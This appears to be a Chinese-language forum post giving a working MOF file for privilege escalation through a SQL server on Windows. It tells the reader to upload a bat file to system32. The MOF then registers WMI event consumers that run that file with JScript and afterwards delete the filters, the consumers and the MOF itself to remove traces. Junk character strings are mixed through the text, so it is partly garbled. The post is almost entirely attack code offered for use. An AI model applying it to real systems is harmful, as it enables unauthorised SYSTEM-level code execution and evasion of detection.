这个sql提权MOF需要运行 system下的文件,不能定义路径。
& j% T1 ?. R: f. E* T$ \1 b需要将要运行的命令写入到bat上传到system32目录,然后执行。7 Q9 M6 t9 C& Y
! J3 [1 U9 ?, \% l这个sql提权MOF需要运行 system下的文件,不能定义路径。/ ]7 _7 U# p' |* C) B" l
需要将要运行的命令写入到bat上传到system32目录,然后执行。+ y2 d: s2 E. C4 l1 o8 k
: d2 q; K! R3 S( }+ U2 Y% a ~#pragma
: b; t6 l- S2 F7 h, `7 ^+ Z* K& h4 O namespace("\\\\.\\root\\cimv2")
9 t3 [2 h9 o0 p# o( d- s class* R( J4 W6 ?2 H5 Q
MyClass5476 X( X* Y/ e5 B9 B/ i
{ [key] d. e8 L' D8 v, s |
string6 B- R1 [* |* }
Name;2 x5 K! q6 h- \$ N
};
6 r- S5 _# B: U6 Y3 k& z' ~ class
6 V1 a" ~/ f" K1 U% R ActiveScriptEventConsumer
& Z! W. x! r' Q6 T : __EventConsumer { [key]& ~% d, z1 q* F; {- N- o
string* S5 a( K4 A/ i0 N! q
Name; [not_null]; C2 M# L* V& p
string
. U, R# ^ y/ Z w ScriptingEngine; string* O5 L5 S' q4 r5 ?4 t
ScriptFileName; [template]
/ \6 H3 V- N* D+ Y string8 H7 h* x# m( n* T; C! F3 H
ScriptText; uint32 KillTimeout;6 Q6 W7 g" M0 n/ K9 I
}; instance of __Win32Provider as $P {, A7 h; Z8 }" X; @
Name: I% C, j V& ]: M
=
) j$ O) | y. n( C9 D "ActiveScriptEventConsumer"; CLSID =$ r( o/ s/ z8 a) U2 `
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
8 X5 ^* T" Q5 Z) `6 X5 b PerUserInitialization
) x/ y& G, q: X" I/ Q8 l! V = TRUE;/ u2 V8 p- @ B- x
}; instance of __EventConsumerProviderRegistration { Provider4 C6 D. p* N4 B
= $P; ConsumerClassNames5 H3 z6 y6 z+ M
=
# U, k9 j; G0 m1 g3 X0 w {"ActiveScriptEventConsumer"};
/ C1 m' ]; U% u. r2 {0 O2 F. _/ } };8 O: z: p8 X: H$ V; a2 D F* j
Instance of ActiveScriptEventConsumer, o4 d0 n5 g% Y5 O. X" x
as $cons { Name
* ? Y, L) C- f. X = O) s! o* Q* a8 ~% n) y6 \
"ASEC"; ScriptingEngine+ V* P. w1 `1 d& B1 ~) G/ k
=$ }5 `2 y$ w* J6 ]6 i8 D
"JScript"; ScriptText
. j' g1 C5 I+ G+ o1 E =# I4 W4 O3 Q- A# a- s# s# j0 ?; Z
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };7 K- ?8 C7 _, S! |9 i
Instance of ActiveScriptEventConsumer
! @6 V+ }; [6 x9 r( h as $cons2 { Name
) g. p2 f1 X5 A. r =- H e* m1 A* Q3 t q2 L
"qndASEC"; ScriptingEngine" Q) e" l6 W9 Q* H! _" h3 u$ d! _
=
: _% X) u5 Q4 L3 a "JScript"; ScriptText; P7 v/ a, j) u6 ~8 A5 l
=
- g) m/ m+ y" c7 x6 f8 n! V "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";% w' m) X8 t4 y# Y% F( O2 l; f
}; instance of __EventFilter as $Filt { Name
0 t& @1 a6 }7 m. y =; R' U( l, o' o& E* e
"instfilt"; Query' h. Y! ^( z; I( h& Q. N* Q" o
=, T& t4 \0 ?$ f. F* ]& u9 i) a
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
( J9 n& i6 [ c ?+ C =/ Z! ~7 I- y1 ^. C+ d
"WQL"; }; instance of __EventFilter as $Filt2 { Name& K% i/ b1 y' w; _% ?% f9 u
=
+ o- S% ~6 S( E$ W8 u# k3 d; ]9 T "qndfilt"; Query1 E$ c2 ~- T2 ~& K3 G% C! G4 k
=
! s# Q6 y9 A d: J6 h& W) U "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage/ ]( z* K) M0 Z
=5 Z5 d* f! A6 D: R+ B1 h; x
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer9 w0 M: b% e$ l
= $cons; Filter
! f/ z& j- x+ y/ t6 T = $Filt;& `$ |# O* q. j: C
}; instance of __FilterToConsumerBinding as $bind2 { Consumer7 [. b- K0 a) @! I2 v
= $cons2; Filter
8 M+ ~/ {5 h g: t = $Filt2;0 r& N7 G e# l. b4 [* R% `
}; instance of MyClass547
4 d+ F2 h! q5 R. U) K# V) U' C: ~ as $MyClass { Name; V* S7 @4 x; v7 J9 E
=0 L5 W. G$ r4 D1 C
"ClassConsumer";8 ~. k9 A! E* P& ]* u% {) G
}; |